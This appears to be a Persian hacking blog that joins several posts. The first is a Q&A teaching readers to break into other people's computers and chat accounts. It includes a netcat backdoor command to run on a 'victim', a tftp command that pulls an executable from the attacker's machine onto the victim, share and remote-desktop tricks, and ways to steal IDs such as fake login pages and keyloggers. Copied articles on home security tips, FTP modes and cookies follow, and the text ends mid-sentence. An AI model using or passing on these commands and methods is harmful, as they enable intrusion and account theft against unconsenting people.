سلام.یه وقتی نظر ندید.بابا من این همه برنامه گذاشتم اما شما کم لطفی می کنید؟

نظر بدید که برنامه های توپی بذارم.بای

faghat_be_khatere_to6000

با سلام خدم شما دوستان عزیز و با آرزوی قبولی طاعات و عبادت شما دوستان.

امروز دیگه می خواستم جواب سوالات دوستانی که پرسیده بودنو بدم.

سوال:چه طوری باید ای پی یک نفرو در بیاریم؟ 

جواب:با رنامه های همچون ای پی اسکنر و ایکس نت استات و ...   که در فرست بعد واسه دانولد می زارم

سوال:چه طوری بدون چت کردن با کسی بتونیم طرفو هک کنیم؟

جواب:باید بگم منظورتون از این هرف اینه که چه طرف باشه و چه نباشه بدون پی ام هکش کنیم.باید بگم که برای این کار شما باید ای دی شو کرک کنید.چه باشه و چه نباشه.اما اگه بتونی ایپی شو پیدا کنی می شه با نتبیوس و یا کچ شل به کامپیوتر طرف وسل بشی و یه سرور روی کامپیوترش کار بذاری (در صورتی که باشه و بتونی ای پی شو در بیاری).

سوال:راههای امنیت سیستم در اینترنت

جواب:1:بستن پرتهای کامپیوتر به وسیله فایروال2:گذاشتن پسوورد برای ادمین ویندوز.3:پنهان کردن ای پی که تا حدی به شما کمک می کنه.4:داشتن انتی ویروس قوی در کامپیوتر.و...     این قسمت خیلی مفصله.شما فعلا همین کارارو انجام بده  تا بقیشو بعدن بهتون بگم.

سوال:چه طوری می تونیم که ای اس پی هک کنیم؟

جواب:شما چند راه دارید.1:هایپر تر مینال2:پیدا کردن ای پی ای اس پس و وصل شدن یه پرتهای 21 (ftp)یا 79. 3:استفاده از باگهای کشف شده(مبحثش مفصله)4:استفاده از نرم افزار در صورتی که شما یوزر رو داشته باشین و یه لیسته پسوورد که اون هر کدوم که درست بود رو بهتون میگه5:با استفاده از thc-scan

سوال: Exploit چسيت؟
جواب:Exploit به قطعه کدی گفته می شود که هکر برای آسيب پذيری يا نفوذ به سيسنم آن را با زبان های مختلف(به خصوص سی و سی پلاس پلاس) می نويسد و ميتوان آن را  بعد از کامپايل و لينک کردن به يک فايل اجرايی تبديل کرد و مورد استفاده قرار داد

سوال:چگونه می توان يک فايل را بعد از شل گرفتن بر روی سيستم قربانی قرار داد؟
جواب:برای اين کار چندين Command وجود دارد که بيشترين Command مورد علاقه ی هکر ها TFTP است که شما بايد برای اين کار کامپيوتر خود را کامپيوتر سرور برای سرويس دهی قرار دهيد تا بعد از شل گرفتن بتوانيد فايلی را از کامپيوتر خود کپی کرده و در کامپيوتر فرد قربانی قرار دهيد
مثال:
آدرس کامپيوتر شما xxx.xxx.xxx.xxx و فايلی به نام amir.exe در درايو سی شما قرار دارد و می خواهيد آن را بر روی کامپيوتری که از آن شل گرفته ايد و در درايو سی آن قرار دهيد.ابتدا شما بايد با يکی از برنامه های سرور TFTP پورت ۶۹ را بر روی کاپيوتر خود باز نماييد حال بعد از اين کار اين قطعه کد را بر روی سيستم قربانی بنويسيد تا برنامه بر روی آن سوار شود
Tftp -i xxx.xxx.xxx.xxx get c:\amir.exe c:\amir.exe

سوال:چگونه می توان به وسیله ی نت کد کامیپوتر دیگری را در اختیار گرفت؟
جواب:برای این کار شما باید کامپیوتر فرد مورد نظر خود را در حال Listinig قرار دهید و به آن اتصال پیدا کنید(همانند کار تروجان ها)
برای به حالت بردن کامپیوتر مورد نظر(قربانی) و اتصال به command کامپیوتر طرف باید این فرامین را در آن کامپیوتر اجرا نمایید
nc -l -p 1834 -t -e cmd.exe
که در این قطعه کد ما پورت 1384 را بر روی کامپیوتر قربانی باز کرده ایم(Backdoor) و حال باید به آن Connect کنیم .با استفاده از یکی از کدهای زیر
nc -v Ip address 1384
nc -vv ipaddress 1384
nc ipaddress 1384
بعد از اتصال شما به Command طرف اتصال پیدا کرده و می توانید فرامینی که در Command قابل اجرا بوده را اجرا نمایید

سوال:چگونه می توان سرويس تلنت را در يک کامپيوتر راه انداخت؟
جواب: من در اين وبلاگ چند بار تلنت رو آموزش دادم می توانيد با مراجعه به بخش پرسش و پاسخ جواب خود را بگيريد اما حالا برای راه اندازی تلنت ۲ روش را برايتان توضيح می دهم
۱- با نوشتن کلمه ی tlntsvr در داس برای راه اندازی تلنت در ويندوز Xp پک ۱و۲
۲- با نوشتن جمله ی net start telnet در داس برای راه اندازی تلنت در ويندوز xp پک ۱

سوال:share چيست؟
جواب:اين يکی از کارهايی که خيلی من دوست دارم واقعا دست ماکروسافت از ساخت اين قسمت از ويندوز درد نکنه .
اين عمل برای اشتراک کردن درايو های کامپيوتر به کار می رود که هکر بعد از شل گرفتن می تواند صفحه ی دسکتاپ يا داخل درايوهای شخص قربانی را مشاهده کرده و با آنها کار کند(در صورت که مشترک شده باشد)
برای اين که شما يکی از درايوها را  مشترک کنيد بايد به داس رفته و عبارت زير را تایپ کنيد
Net share amirHacker$=drive:\amir
که البته اين دستور يکی از درايوها  و پوشه ی amir را مشترک کرده و شما می توانيد به آن وارد شويد(در صورت داشتن کلمه ی عبور و نام کاربر)
البته در اين دستور بايد به جای کلمه ی Drive بايد درايو مورد نظر خود و همچنين به جای پوشه ی amir پوشه ی مورد نظر خود را بنويسيد
مثال:برای مشترک کردن درايو c و پوشه amirبايد عبارت زير را بنويسيد
Net share amir$=c:\amir

سوال:برای دیدن دسکتاب دیگران باید چه کار کنیم؟

جواب:شما باید در run بنویسی mstsc بعد بعد اینتر .سپس ای پی بدید و بعد کانکت و اگزم یوزر و پس خواست دید.

سوال:شل گرفتن چیست؟

جواب:به روشی که شما با استفاده از داس که توسط ان اجرا میشه به کامپوتر طرف وصل بشی.

سوال:چه طوری میشه سایت هک کرد؟

جواب:هک سیات روشهای خیلی زیادی داره.

1:کرک سایت    2:با استفاده از باگهایی که کشف شده و یا شما بدست میارین

3:ضعف امنیتی asp.net        4:ضعف امنیتی phpnuk

5:وصل شدن به پرت 21        6:....

در مورد هک سایت بعدا مفصل صحبت می کنم

و اخرین سوال:روشهای هک ای دی.

جواب:شما چند روش دارید که با استفاده ار انها می تونید این کارو انجام بدین.1:کرک کردن ای دی با کرکر که لیست پسوورد ازتون می خواد.2:صفحه قلابی(دیگه تابلو شده)3:وصل شدن با گچ شل و یا نت بایوس و کامپوتر و فرستادن فایا اجرایی.(اجراش نکنی)4:یه روشی هست که تازه اومده  اونم اینکه به طرف یه پی او میدی و اونم اگه جوابتو بده پسش واست میاد که این روش خیلی خطریه5:با گول زدن طرف به طوری که شما می تونید با استفاده از پرت 25 طرفو گول بزنید(خواهشن نگید چه طوری)6:استفاده از کی لوگر ها 7:...

خوب اینم جواب سوالاتون.فقط ازتون خواهش می کنم که برای بهتر شدن وبلاگ به من کمک کنید و نطر بدین.

هر روزه اخبار جدیدی در مورد حملات و تهدیدات کامپیوتری در رسانه های مختلف انتشار می یابد. این تهدیدات شامل ویروس های جدید و یا انواع هک و نفوذ در سیستم های کامپیوتری است. انتشار این گونه اخبار باعث شیوع اضطراب و نگرانی در بین کاربرانی می شود که به صورت مستمر از کامپیوتر بهره می گیرند و یا اطلاعاتی ارزشمند بر روی کامپیوترهای خود دارند.

در این مقاله سعی شده چند نکته که در رابطه با امنیت کامپیوتر اهمیت اساسی دارند به صورت مختصر شرح داده شوند. یک کاربر در صورت رعایت این نکات می تواند تا حدود زیادی از حفظ امنیت سیستم کامپیوتری خود مطمئن باشد. در رابطه با بعضی از نکات که توضیحات بیشتری لازم بوده، مقالات جامع تری معرفی گردیده اند.

1.       استفاده از نرم افزارهای محافظتی (مانند ضدویروس ها) و به روز نگه داشتن آنها

از وجود ضدویروس بر روی دستگاه خود اطمینان حاصل کنید. این نرم افزارها برای محافظت از کامپیوتر در برابر ویروس های شناخته شده به کارمی روند و در صورت استفاده از آنها کاربر نیاز به نگرانی در مورد ویروس ها نخواهد داشت. در شرایطی که روزانه ویروس های جدید تولید شده و توزیع می شوند، نرم افزارهای ضدویروس برای تشخیص و از بین بردن آنها باید به صورت منظم به روز شوند. برای این کار می توان به سایت شرکت تولید کننده ضدویروس مراجعه کرد و اطلاعات لازم در مورد نحوه به روز رسانی و نیز فایل های جدید را دریافت نمود. عموما نرم افزارهای ضدویروس ابزار های به روز رسانی و زمان بندی این فرایند را در خود دارند. برای مطالعه بیشتر در مورد ویروس ها و آشنایی با طرز کار و قابلیت های ضدویروس ها به سایت گروه امداد امنیت کامپیوتری ایران مراجعه نمایید. 

2.       باز نکردن نامه های دریافتی از منابع ناشناس

این قانون ساده را پیروی کنید، «اگر فرستنده نامه را نمی شناسید، نسبت به نامه و پیوست های آن بسیار با دقت عمل نمایید». هرگاه یک نامه مشکوک دریافت کردید، بهترین عمل حذف کل نامه همراه با پیوست های آن است.

برای امنیت بیشتر حتی اگر فرستنده نامه آشنا باشد هم باید با احتیاط بود. اگر عنوان نامه نا آشنا و عجیب باشد، و بالاخص در صورتی که نامه حاوی لینک های غیرمعمول باشد باید با دقت عمل کرد. ممکن است دوست شما به صورت تصادفی ویروسی را برای شما فرستاده باشد. ویروس “I Love You” دقیقا به همین صورت میلیون ها کامپیوتر را در سراسر دنیا آلوده نمود. تردید نکنید، نامه های مشکوک را پاک نمایید.

مقالات محافظت در برابر خطرات ایمیل ۱ و ۲ به صورت مفصل در رابطه با این موضوع نگاشته شده است

3.       استفاده از گذرواژه های مناسب

گذرواژه تنها در صورتی دسترسی غریبه ها به منابع موجود را محدود می کند که حدس زدن آن به سادگی امکان پذیر نباشد. گذرواژه های خود را در اختیار دیگران قرار ندهید و از یک گذرواژه در بیشتر از یک جا استفاده نکنید. در این صورت اگر یکی از گذرواژه های شما لو برود، همه منابع در اختیار شما در معرض خطر قرار نخواهند گرفت. قانون طلایی برای انتخاب گذرواژه شامل موارد زیر است:

·         گذرواژه باید حداقل شامل ۸ حرف بوده، حتی الامکان کلمه ای بی معنا باشد. در انتخاب این کلمه اگر از حروف کوچک، بزرگ و اعداد استفاده شود (مانند xk27D8Fy) ضریب امنیت بالا تر خواهد رفت.

·         به صورت منظم گذرواژه های قبلی را عوض نمایید.

·         گذرواژه خود را در اختیار دیگران قرار ندهید.

در مقاله انتخاب و محافظت از کلمات عبور نکات دقیق تری در این رابطه بیان شده است.

4.       محافظت از کامپیوتر در برابر نفوذ  با استفاده از حفاظ(Firewall)

حفاظ  دیواری مجازی بین سیستم کامپیوتری و دنیای بیرون ایجاد می کند. این محصول به دو صورت نرم افزاری و سخت افزاری تولید می شود و برای حفاظت کامپیوترهای شخصی و نیز شبکه ها به کار می رود. حفاظ داده های غیر مجاز و یا داده هایی که به صورت بالقوه خطرناک می باشند را فیلتر کرده و سایر اطلاعات را عبور می دهد. علاوه بر این حفاظ در شرایطی که کامپیوتر به اینترنت وصل است، مانع دسترسی افراد غیرمجاز به کامپیوتر می شود.

مقاله مقدمه ای بر فایروال به معرفی نحوه عملکرد حفاظ ها می پردازد و یکی از رایج ترین حفاظ های شخصی در مقاله  حفاظ شخصی ZoneAlarm معرفی شده است.

5.       خودداری از به اشتراک گذاشتن منابع کامپیوتر با افراد غریبه

سیستم های عامل این امکان را برای کاربران خود فراهم می آورند که با هدف به اشتراک گذاری فایل، دسترسی دیگران را از طریق شبکه و یا اینترنت به دیسک سخت محلی فراهم آورند. این قابلیت  امکان انتقال ویروس از طریق شبکه را فراهم می آورد. از سوی دیگر در صورتی که کاربر دقت کافی را در به اشتراک گذاشتن فایل ها به عمل نیاورد، امکان مشاهده فایل های خود را به دیگرانی که مجاز نیستند ایجاد می کند. بنابراین درصورتی که نیاز واقعی به این قابلیت ندارید، به اشتراک گذاری فایل را متوقف نمایید.

6.       قطع اتصال به اینترنت در مواقع عدم استفاده

به خاطر داشته باشید که بزرگ راه دیجیتال یک مسیر دوطرفه است و اطلاعات ارسال و دریافت می شوند. قطع اتصال کامپیوتر به اینترنت در شرایطی که نیازی به آن نیست احتمال اینکه کسی به دستگاه شما دسترسی داشته باشد را از بین می برد.

7.       تهیه پشتیبان از داده های موجود بر روی کامپیوتر

همواره برای از بین رفتن اطلاعات ذخیره شده بر روی حافظه دستگاه خود آمادگی داشته باشید. امروزه تجهیزات سخت افزاری و نرم افزاری متنوعی برای تهیه نسخه های پشتیبان توسعه یافته اند که با توجه به نوع داده و اهمیت آن می توان از آنها بهره گرفت. بسته  به اهمیت داده باید سیاست گذاری های لازم انجام شود. در این فرایند تجهیزات مورد نیاز و زمان های مناسب برای تهیه پشتیبان مشخص می شوند. علاوه بر این باید همواره دیسک های Start up در دسترس داشته باشید تا در صورت وقوع اتفاقات نامطلوب بتوانید در اسرع وقت سیستم را بازیابی نمایید.

8.       گرفتن منظم وصله های امنیتی(Patches)

بیشتر شرکت های تولید کننده نرم افزار هر از چند گاهی نرم افزارهای به روز رسان و وصله های امنیتی جدیدی را برای محصولات خود ارائه می نمایند. با گذر زمان اشکالات جدید در نرم افزارهای مختلف شناسایی می شوند که امکان سوءاستفاده را برای هکرها بوجود می آورند. پس از شناسایی هر اشکالی شرکت تولید کننده محصول اقدام به نوشتن وصله های مناسب برای افزایش امنیت و از بین بردن راه های نفوذ به سیستم می کنند. این وصله ها بر روی سایت های وب شرکت ها عرضه می شود و کاربران باید برای تامین امنیت سیستم خود همواره آخرین نسخه های وصله ها را گرفته و بر روی سیستم خود نصب کنند. برای راحتی کاربران ابزارهایی توسعه داده  شده اند که به صورت اتوماتیک به سایت های شرکت های تولید کننده محصولات وصل شده، لیست آخرین وصله ها را دریافت می نمایند. سپس با بررسی سیستم موجود نقاط ضعف آن شناسایی و به کاربر اعلام می شود. به این ترتیب کاربر از وجود آخرین نسخه های به روز رسان آگاه می شود.

9.       بررسی منظم امنیت کامپیوتر

در بازه های زمانی مشخص وضعیت امنیتی سیستم کامپیوتری خود را مورد ارزیابی قرار دهید. انجام این کار در هر سال حداقل دو بار توصیه می شود. بررسی پیکربندی امنیتی نرم افزارهای مختلف شامل مرورگرها و حصول اطمینان از مناسب بودن تنظیمات سطوح امنیتی در این فرایند انجام می شوند.

10.    حصول اطمینان از آگاهی اعضای خانواده و یا کارمندان از نحوه برخورد با کامپیوترهای آلوده

هر کسی که از کامپیوتر استفاده می کند باید اطلاعات کافی در مورد امنیت داشته باشد. چگونگی استفاده از ضدویروس ها و به روز رسانی آنها، روش گرفتن وصله های امنیتی و نصب آنها و چگونگی انتخاب گذرواژه مناسب از جمله موارد ضروری می باشد.

FTP ،‌ يك پروتكل ارسال فايل است كه با استفاده از آن سرويس گيرندگان می توانند به سرويس دهندگان متصل و صرفنظر از نوع سرويس دهنده اقدام به دريافت و يا ارسال فايل نمايند . پروتكل FTP به منظور ارائه خدمات خود از دو حالت متفاوت استفاده می نمايد : Active Mode و Passive Mode . مهمترين تفاوت بين روش های فوق جايگاه سرويس دهنده و يا سرويس گيرنده در ايجاد و خاتمه يك ارتباط است .
همانگونه كه در بخش اول اشاره گرديد ، يك اتصال پروتكل TCP/IP ( نسخه شماره چهار) شامل دو نقطه مجزا می باشد كه هر نقطه از يك آدرس IP و يك شماره پورت استفاده می نمايد . برقراری ارتباط بين يك سرويس گيرنده و يك سرويس دهنده منوط به وجود چهار عنصر اطلاعاتی است : آدرس سرويس دهنده ،‌پورت سرويس دهنده ، آدرس سرويس گيرنده و پورت سرويس گيرنده . در زمان برقراری يك ارتباط ، سرويس گيرنده از يك شماره پورت استفاده می نمايد . اين شماره پورت می تواند متناسب با نوع عملكرد برنامه سرويس گيرنده به صورت اختياری و يا اجباری باشد . مثلا" برخی برنامه های سرويس گيرنده به منظور ارتباط با سرويس دهنده ، نيازمند استفاده از يك شماره پورت خاص می باشند ( نظير برنامه های سرويس گيرنده وب و يا مرورگرهای وب كه از پورت شماره 80 به منظور ارتباط با سرويس دهنده وب استفاده می نمايد) . در مواردی كه الزامی در خصوص شماره پورت وجود ندارد از يك شماره پورت موقتی و يا ephemeral استفاده می گردد . اين نوع پورت ها موقتی بوده و توسط IP stack ماشين مربوطه به متقاضيان نسبت داده شده و پس از خاتمه ارتباط ، پورت آزاد می گردد . با توجه به اين كه اكثر IP Stacks بلافاصله از پورت موقت آزاد شده استفاده نخواهند كرد ( تا زمانی كه تمام pool تكميل نشده باشد ) ،‌در صورتی كه سرويس گيرنده مجددا" درخواست برقراری يك ارتباط را نمايد ، يك شماره پورت موقتی ديگر به وی تخصيص داده می شود .
پس از اين مقدمه ،‌ در ادامه به بررسی هر يك از روش های Active و Passive در پروتكل FTP خواهيم پرداخت .

Active Mode
Active Mode ، روش سنتی ارتباط بين يك سرويس گيرنده FTP و يك سرويس دهنده می باشد كه عملكرد آن بر اساس فرآيند زير است :

*

سرويس گيرنده يك ارتباط با پورت 21 سرويس دهنده FTP برقرار می نمايد . پورت 21 ، پورتی است كه سرويس دهنده به آن گوش فرا می دهد تا از صدور فرامين آگاه و آنان را به ترتيب پاسخ دهد . سرويس گيرنده برای برقراری ارتباط با سرويس دهنده از يك پورت تصادفی و موقتی ( بزرگتر از 1024 ) استفاده می نمايد( پورت x ).
*

سرويس گيرنده شماره پورت لازم برای ارتباط سرويس دهنده با خود را از طريق صدور دستور PORT N+1 به وی اطلاع می دهد ( پورت x+1 )
*

سرويس دهنده يك ارتباط را از طريق پورت 20 خود با پورت مشخص شده سرويس گيرنده ( پورت x+1 ) برقرار می نمايد .

لطفا" به من از طريق پورت 1931 بر روی آدرس
IP: 192.168.1.2 متصل و سپس داده را ارسال نمائيد .
سرويس گيرنده
تائيد دستور سرويس دهنده

در فرآيند فوق ، ارتباط توسط سرويس گيرنده آغاز و پاسخ به آن توسط سرويس دهنده و از طريق پورت x+1 كه توسط سرويس گيرنده مشخص شده است ، انجام می شود . در صورتی كه سرويس گيرنده از سيستم ها و دستگاه های امنيتی خاصی نظير فايروال استفاده كرده باشد ، می بايست تهميدات لازم به منظور ارتباط كامپيوترهای ميزبان راه دور به سرويس گيرنده پيش بينی تا آنان بتوانند به هر پورت بالاتر از 1024 سرويس گيرنده دستيابی داشته باشند . بدين منظور لازم است كه پورت های اشاره شده بر روی ماشين سرويس گيرنده open باشند . اين موضوع می‌ تواند تهديدات و چالش های امنيتی متعددی را برای سرويس گيرندگان به دنبال داشته باشد .

Passive Mode
در Passive Mode ، كه به آن " مديريت و يا اداره سرويس گيرندگان FTP" نيز گفته می شود از فرآيند زير استفاده می گردد :

*

سرويس گيرنده دو پورت را فعال می نمايد ( پورت x و x+1 )
*

ارتباط اوليه از طريق پورت x سرويس گيرنده با پورت 21 سرويس دهنده آغاز می گردد .
*

سرويس دهنده يك پورت را فعال ( Y ) و به سرويس گيرنده شماره پورت را اعلام می نمايد .
*

در ادامه سرويس گيرنده يك اتصال از طريق پورت x+1 با پورت y سرويس دهنده برقرار می نمايد .



لطفا" به من بگوئيد كه از كجا می توانم داده را دريافت نمايم
سرويس گيرنده
با من از طريق پورت 4023 بر روی آدرس
IP: 192.168.1.25 ارتباط برقرار نمائيد . سرويس دهنده

در فرآيند فوق ، سرويس گيرنده دارای نقش محوری است و فايروال موجود بر روی سرويس گيرنده می تواند درخواست های دريافتی غيرمجاز به پورت های بالاتر از 1024 را به منظور افزايش امنيت بلاك نمايند . در صورتی كه بر روی كامپيوترهای سرويس دهنده نيز فايروال نصب شده باشد ، می بايست پيكربندی لازم به منظور استفاده از پورت های بالاتر از 1024 بر روی آن آنجام و آنان open گردند . باز نمودن پورت های فوق بر روی سرويس دهنده می تواند چالش های امنيتی خاصی را برای سرويس دهنده به دنبال داشته باشد .
متاسفانه تمامی سرويس گيرندگان FTP از Passive Mode حمايت نمی نمايند . اگر يك سرويس گيرنده بتواند به يك سرويس دهنده login نمايد ولی قادر به ارسال داده بر روی آن نباشد ، نشاندهنده اين موضوع است كه فايروال و يا Gateway برای استفاده از Passive Mode به درستی پيكربندی نشده است .

ملاحضات امنيتی
در صورتی كه فايروال های موجود بر روی كامپيوترهای سرويس گيرنده به درستی پيكربندی نگردند ، آنان نمی توانند از Active Mode استفاده نمايند . در Passive Mode استحكام سيستم امنيتی در سمت سرويس دهنده و توسط فايروال مربوطه انجام خواهد شد . بنابراين لازم است به سرويس دهنده اجازه داده شود كه به اتصالات هر پورت بالاتر از 1024 پاسخ دهد . ترافيك فوق ، معمولا" توسط فايروال سرويس دهنده بلاك می گردد . در چنين شرايطی امكان استفاده از Passive Mode وجود نخواهد داشت .

Passive Mode و يا Active Mode ؟
با توجه به مستندات درج شده در RFC 1579 ، استفاده از Passive Mode به دلايل متعددی به Active Mode ترجيح داده می شود :

*

تعداد سرويس دهندگان موجود بر روی اينترنت به مراتب كمتر از سرويس گيرندگان می باشد .
*

با استفاده از امكانات موجود می توان سرويس دهندگان را پيكربندی تا بتوانند از مجموعه پورت های محدود و تعريف شده ای با در نظر گرفتن مسائل امنيتی ، استفاده نمايند.

پيكربندی فايروال
جدول زير پيكربندی فايروال در Active Mode و Passive Mode را نشان می دهد .
Active Mode
Server Inbound

from any client port >1024 to port 21 on the server
Server Outbound

from port 20 on the client on any port > 1024
Client Inbound ports 20 from the server to any port >1024 on client
Client Outbound

from any port >1024 to port 21 on the server
Passive Mode
Server Inbound port 21 and any port >1024 from client/anywhere, from any port >1024
Server Outbound port 21 and any port >1024 to client/anywhere, to any port >1024
Client Inbound Return traffic, any port > 1024 from server using any port >1024

و اما يك نكته ديگر در رابطه با پروتكل FTP !
در صورتی كه در زمان دريافت يك فايل با استفاده از پروتكل FTP مشكلات خاصی ايجاد كه منجر به قطع ارتباط با سرويس دهنده FTP گردد ،‌ سرويس گيرنده می تواند با مشخص كردن يك offset از فايل دريافتی به سرويس دهنده اعلام نمايد كه عمليات ارسال را از جائی كه ارتباط قطع شده است ، ادامه دهد ( سرويس گيرنده از محلی شروع به دريافت فايل می نمايد كه ارتباط غيرفعال شده بود ) . استفاده از ويژگی فوق به امكانات سرويس دهنده FTP بستگی دارد .

«کوکی» بخش کوچکی از اطلاعات فرستاده شده توسط وب‌سرور برای ذخیره در مرورگر است تا بتواند بعدا از طریق آن مرورگر، دوباره خوانده شود. دیتای ذخیره شده برای اینکه وب‌سرور یک سایت، اطلاعات مشخصی را درباره بازدیدکننده آن وب‌سایت خاص بداند، مفید است. کوکی فرمت فایل متنی را دارد که در دایرکتوری مربوط به مرورگر ذخیره می‌شود و در هنگامی که مرورگر در حال اجراست در حافظه RAM قرار می‌گیرد. این اطلاعات می‌تواند هنگامی که کاربر از وب‌سایت خاصی خارج شد، در هارد درایو ذخیره شود. کوکی‌ها ابزار بسیار مهمی برای نگهداشتن state روی وب هستند. state به توانایی یک برنامه برای کار با کاربر بصورت محاوره‌ای اشاره دارد. برای مثال،  شما برای استفاده از قطار یا اتوبوس بلیت رزرو می‌کنید. در روز سفر، هنگامی که بلیت را نشان می‌دهید، اجازه خواهید یافت که وارد قطار یا اتوبوس شوید، در غیراینصورت مسوول وسیله نقلیه نمی‌داند که آیا شما این اجازه را دارید یا خیر. در حقیقت در اینجا بلیت برای نگهداشتن state‌ بین شما و مسوول قطار مهم است. HTTP یک پروتکل بدون قابلیت state‌ است. به این معنی که هر بار مشاهده یک سایت توسط سرور بعنوان اولین مشاهده کاربر تلقی می‌شود. به این معنی که سرور همه چیز را بعد از هر درخواست فراموش می‌کند، مگر اینکه یک بازدید‌کننده برای یادآوری آینده به سرور به طریقی مشخص گردد. کوکی‌ها این کار را انجام می‌دهند.

کوکی‌ها فقط می‌توانند به وب‌سرور بگویند که آیا شما قبلا هم از سایت دیدن کرده‌اید و اطلاعات کمی (مثلا یک شماره کاربر) در مرتبه بعد که از سایت دیدن می‌کنید از خود وب‌سرور به آن برگردانند. بیشتر کوکی‌ها هنگامی که از مرورگر خارج می‌شوید از بین می‌روند. نوع دیگری از کوکی‌ها بعنوان کوکی ماندگار وجود دارند که تاریخ انقضاء دارند و تا آن تاریخ روی هارددرایو شما باقی می‌مانند. کوکی ماندگار می‌تواند برای ردگیری عادات وبگردی یک کاربر با مشخص‌کردن وی هنگام مراجعه مجدد به یک سایت مورد استفاده قرار گیرد. اطلاعات در مورد اینکه اهل کجا هستید و به چه صفحات وبی سر می‌زنید در فایلهای لاگ یک وب‌سرور وجود دارد و می‌تواند برای ردگیری رفتار وبگردی کاربران مورد استفاده قرار گیرند، اما کوکی‌ها آن را آسانتر می‌کنند.

چگونه می‌توان از وجود کوکی‌های ماندگار روی سیستم مطلع شد؟

کوکی‌های ماندگار در مکانهای مختلفی روی سیستم شما بسته به مرورگر وب و نسخه‌ای از آن که استفاده می‌کنید، ذخیره می‌شوند. نت‌اسکیپ تمام کوکی‌های ماندگارش را در فایلی به نام cookies.txt روی کامپیوتر شما در دایرکتوری نت‌اسکیپ ذخیره می‌کند. می‌توانید این فایل را با یک ویرایشگر متن باز و ویرایش کنید و یا هر کوکی را که نمی‌خواهید نگهدارید، پاک کنید و چنانچه می‌خواهید از دست تمام کوکی‌ها خلاص شوید، فایل را پاک کنید. اینترنت‌اکسپلورر کوکی‌های ماندگار را در فایلهای جداگانه ذخیره می‌کند و توسط نام کاربر و نام دامنه سایتی که کوکی را فرستاده است، نامگذاری می‌کند. برای مثال  john@ciac.txt.  این کوکی‌ها در دایرکتوری /Windows/cookies  یا /Windows/profiles/cookies  ذخیره می‌شوند. می‌توانید هرکدام از این کوکی‌ها را که نمی‌خواهید، پاک کنید. می‌توانید این فایلها را بازکنید تا ببینید از کجا آمده‌اند و چه اطلاعاتی دارند. برای مثال آنچه می‌بینید محتویات یک کوکی IE‌ هستند.

WEBTRENDS_ID

61.1.129.58-1041789995.121030

www.bazee.com/

1024

3872737152

30271763

3731731632

29537508

*

این فایل کوکی abhishek@www.bazee.txt (abhishek شناسه فرد وارد شونده به سایت است) نامیده شده است. کوکی‌ها ممکن است اطلاعات مختلفی را دربرداشته باشند که بسته به کوکی متفاوت است. در این کوکی IP فرد نیز (61.1.129.58) ذخیره شده است. در اینجا قصد وارد شدن به جزئیات را نداریم. 

کوکی‌ها برای چه استفاده می‌شوند؟

یک استفاده از کوکی‌ها برای ذخیره کلمات عبور و شناسه‌های برای وب‌سایتهای خاص است. همچنین برای ذخیره اولویتهای کاربران در صفحات آغازین نیز استفاده می‌شوند. در این حالت مقداری از هارد کامپیوتر شما برای ذخیره این اطلاعات از مرورگرتان تقاضا می‌شود. بدین طریق، هر زمان که به آن وب‌سایت وارد می‌شوید مرورگر شما بررسی می‌کند که ببیند آیا الویتهای از پیش تعیین‌شده‌ (کوکی) برای آن سرور مشخص دارید یا خیر. اگر اینطور باشد، مرورگر کوکی را همراه با تقاضای شما برای صفحه وب، به وب‌سرور ارسال خواهد کرد. مایکروسافت و نت‌اسکیپ از کوکی‌هایی برای ایجاد صفحات آغازین شخصی روی وب‌سایتهایشان استفاده می‌کنند. استفاده‌های معمول که شرکتها بخاطر آنها از کوکی استفاده می‌کنند شامل سیستمهای سفارش آنلاین، شخصی‌سازی سایتها و ردگیری وب‌سایتها می‌شود.

کوکی‌ها منافعی دارند. شخصی‌سازی سایت یکی از مفیدترین استفاده‌های کوکی‌ها است. برای مثال، فردی وارد سایت CNN (یا حتی MyYahoo) می‌شود اما نمی‌خواهد اخبار تجاری را ببیند. این سایت به فرد اجازه این انتخاب را می‌دهد. از این به بعد (یا تا زمانیکه کوکی منقضی می‌شود) این شخص اخبار تجاری را وقتی به سایت CNN‌ متصل می‌شود، نمی‌بیند. حتما تا حالا دیده‌اید که در بعضی وب‌سایتها هنگامی که با استفاده از شناسه و گذرواژه وارد می‌شوید، انتخابی تحت عنوان «مرا دفعه بعد بخاطر داشته باش» وجود دارد. این امر با ذخیره شدن شناسه و کلمه‌عبور شما در یک کوکی روی کامپیوترتان، میسر می‌شود.

بعضی بازدیدکنندگان آن را بعنوان تعرض به حریم خصوصی می‌پندارند برای وب‌سایتهایی که روند فعالیتشان روی یک سایت را ردگیری می‌کنند. این کمک می‌کند که اطلاعات و سرویس‌های مورد جستجو را بسرعت بیابید و بدون تاخیر به سر کار اصلی خودتان برگردید. آمار برای طراحی مجدد سایت بسیار مهم هستند. گاهی مدیر سایت نیاز دارد بداند آیا ۱۰۰ نفر مختلف از سایتش بازدید کرده‌اند یا فقط یک فرد (یا روبات)‌ بطور پیوسته ۱۰۰ مرتبه دکمه reload (یا refresh) را انتخاب کرده است. کوکی‌ها کاربردهای دیگری نیز دارند و یکی از آنها امکان ردگیری فعالیت کاربران است. اجازه دهید که یک مثال را ببینیم.

DoubleClickNetwork سیستمی است که توسط DoubleClickCorporation ایجاد شده است تا پروفایل افرادی را که از وب استفاده می‌کنند ایجاد کند و آگهی‌های تجاری متناسب با علاقه‌شان را به آنها ارائه کند. مشتری‌های DoubleClick  وب‌سایتهایی هستند که قصد تبلیغ خدماتشان را دارند. هر عضو این شبکه میزبانی برای تبلیغ سایر اعضاء می‌شود. هر وب‌سایت که عضو می‌شود تبلیغ خود را ایجاد و در اختیار سرور DoubleClick  قرار می‌دهد. هنگامی که یک کاربر به یکی از این سایتها می‌رود، یک آگهی از سایر سایتها نیز در HTML‌ ارائه شده به کاربر وجود دارد. با هربار بارگذاری مجدد صفحه، آگهی متفاتی به کاربر ارائه می‌شود. از نظر کاربران این تبلیغات با سایر تبلیغات تفاوتی ندارند، در حالیکه اینطور نیست. هنگامی که کاربری برای اولین بار به سرور DoubleClick‌ متصل می‌شود، سرور یک کوکی برای آن مرورگر ایجاد می‌کند که یک شماره مشخصه یکتا در بردارد. از آن به بعد هر زمان که کاربر به یکی از وب‌سایتهای عضو DoubleClick‌ متصل می‌شود، شماره مذکور به سرور ارسال می‌شود و کاربر تشخیص داده می‌شود. با گذشت زمان و داشتن اطلاع از سایتهایی که کاربر بازدید کرده است، پروفایلی از علائق کاربر در اختیار سرور قرار می‌گیرد. با داشتن این پروفایل، سرور DoubleClick می‌تواند تبلیغاتی را که بیشتر مورد نظر کاربر است انتخاب کند. بعلاوه می‌تواند از این اطلاعات برای دادن بازخورد مناسب به 